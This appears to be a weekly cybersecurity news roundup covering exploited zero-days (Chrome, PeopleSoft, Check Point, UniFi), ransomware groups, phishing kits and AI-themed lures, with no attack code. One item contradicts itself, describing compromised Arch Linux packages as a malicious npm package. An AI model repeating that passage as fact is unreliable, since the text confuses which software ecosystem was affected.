The cybersecurity landscape continues to be a battleground of innovation and exploitation, with attackers consistently finding new ways to leverage existing vulnerabilities and emerging technologies. This week’s recap highlights a series of concerning trends, from actively exploited zero-days in widely used software to the sophisticated abuse of phishing kits and AI-powered lures. The recurring theme is that the simplest oversights, like forgotten software and outdated protocols, remain potent entry points for malicious actors.
A critical Google Chrome zero-day, CVE-2026-11645, has been patched after being actively exploited in the wild. This vulnerability, an out-of-bounds memory access in Chrome’s V8 JavaScript engine, underscores the persistent threat of zero-day exploits and the speed at which they can be weaponized. This marks the fifth actively exploited Chrome zero-day this year, indicating a concerning trend in the exploitation of browser vulnerabilities.
Threats This Week: Exploited Vulnerabilities and Phishing Kits
The ShinyHunters gang has exploited a critical zero-day vulnerability (CVE-2026-35273) in Oracle PeopleSoft, a system used by numerous enterprises. This flaw, related to missing authentication for a critical function, could allow unauthenticated attackers to gain complete control of PeopleSoft Enterprise PeopleTools. Exploitation was observed between late May and early June 2026, with attacks primarily targeting the higher education sector. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added this vulnerability to its Known Exploited Vulnerabilities catalog, mandating immediate patching for federal agencies.
Meanwhile, hundreds of Arch Linux packages have been compromised, allowing attackers to distribute a rootkit and a stealer through preinstall scripts. The malicious npm package, dubbed “atomic-lockfile” by Sonatype, contains a Linux payload designed for credential harvesting, stealth, and anti-debugging. Originally affecting around 400 packages, the number has since surged to over 1,500. Arch Linux developers are actively removing the malicious commits.
Furthermore, a significant phishing-as-a-service (PhaaS) operation named Outsider has been dismantled by the FBI. This Chinese-based operation was responsible for an estimated 3,870,000 stolen credit cards and substantial financial losses. Google revealed that Outsider operators weaponized its Gemini AI to generate fraudulent phishing pages and deploy massive smishing attacks, impersonating legitimate brands. The service, costing as little as $88 per week, provided over 290 pre-built templates to steal credentials, multi-factor authentication codes, and financial information.
Check Point has also warned of active exploitation of a critical vulnerability (CVE-2026-50751) in its Remote Access VPN and Mobile Access deployments, specifically those configured with the deprecated IKEv1 protocol. This flaw allows unauthenticated attackers to bypass user authentication and establish unauthorized VPN connections. Exploitation, observed since early May, has been limited to a “few dozen targeted organizations globally” and has been associated with a Qilin ransomware affiliate in some instances.
The Gentlemen ransomware operation, previously operating as an affiliate for groups like LockBit and Qilin, has been analyzed. Tracking the group as Phantom Mantis, Microsoft notes its evolution from a closed ransomware group to offering its ransomware-as-a-service (RaaS) to other affiliates. The Gentlemen operation has been active since March 2025, claiming 478 victims to date.
Trending Vulnerabilities and AI-Driven Attacks
The shrinking window between the release of a patch and its exploitation remains a critical concern. This week’s trending CVEs highlight the urgency for organizations to address vulnerabilities across various platforms, including Google Chrome (CVE-2026-11645), Check Point VPN (CVE-2026-50751), Oracle PeopleSoft (CVE-2026-35273), and numerous SAP products. The prevalence of SAP vulnerabilities, such as CVE-2026-44748 and CVE-2026-27671, underscores the need for diligent patching of enterprise resource planning (ERP) systems.
Microsoft has also issued a warning about cyber campaigns capitalizing on the global interest in artificial intelligence (AI) as a social engineering lure. These campaigns, spanning phishing, malvertising, and SEO-driven attacks, aim to steal credentials, facilitate financial fraud, or deploy malware. Examples include ChatGPT-themed lures leading to credit card data theft, Claude-themed phishing for credentials, and fake AI plugin installers distributing stealer malware. The initial access broker Storm-3075 has been observed using AI-themed malvertising to deliver payloads.
Additionally, macOS users are being targeted by deceptive installers for popular software, distributing information stealers. Threat actors use SEO poisoning and compromised links on torrent networks to trick users into downloading malicious DMG files. Over 65% of newly reported macOS malware in 2024 has been classified as infostealers, highlighting the growing threat to Apple’s ecosystem.
The illicit online marketplace scene continues to evolve, with Flare shedding light on the “guarantee model” that powers Telegram-based escrow services. These marketplaces, often rooted in legitimate Chinese consumer-internet trust architecture, facilitate transactions for money laundering, stolen data, and more. Despite law enforcement crackdowns, these criminal enterprises are fragmenting and adapting, with over 30 successor marketplaces emerging.
UniFi OS flaws (CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910) are being actively exploited, leading to remote code execution and the deployment of common malware. Meanwhile, a targeted cyber espionage campaign, Khmer Shadow, has been seen targeting Cambodian government entities with a custom loader dubbed NIGHTFORGE, leveraging advanced defense-evasion techniques.
Palo Alto Networks Unit 42 warns that attackers could exploit cloud logging services to create weak spots, evade detection, and maintain visibility within a target environment. This could involve tampering with logs or rerouting them to attacker-controlled accounts. Operation TaxShadow, an Indian tax-themed phishing campaign, is delivering a sophisticated multi-stage malware framework, manipulating victims with fraudulent tax notifications. The campaign uses a highly modular architecture with advanced defense-evasion techniques.
A new Android trojan, MagicAd, has been found bypassing operating system restrictions to display background ads, distributed through Xiaomi’s GetApps store and the Samsung Galaxy Store. Residential proxies continue to see a significant increase in usage, with monthly queries growing by approximately 25%. This rise is attributed to the demand for AI-related training that requires web scraping, as residential proxies effectively bypass many anti-scraping measures.
The SHEET#CREEP campaign is distributing a C# remote access trojan (RAT) via a diplomatic-themed ISO phishing lure. The RAT uses the Google Sheets API as its command-and-control channel. Malware distributed via npm and PyPI packages remains a significant concern, with cryptocurrency-focused campaigns stealing wallet keys and credentials. A ransomware attack investigated by Huntress used Easyupload.io for data exfiltration, highlighting the reliance on simple file-sharing services.
Conclusion
The persistent exploitation of legacy systems, outdated protocols, and human error demonstrates that attackers do not require groundbreaking innovation to achieve success. The current threat landscape underscores the critical importance of maintaining robust security hygiene, including regular patching, diligent monitoring of known exploited vulnerabilities, and comprehensive security awareness training. The uncomfortable reality is that many organizations may already harbor latent vulnerabilities within their existing infrastructure, waiting for the opportune moment to be exploited. Organizations should remain vigilant and proactive in their security posture, as the next major incident could stem from a seemingly innocuous oversight.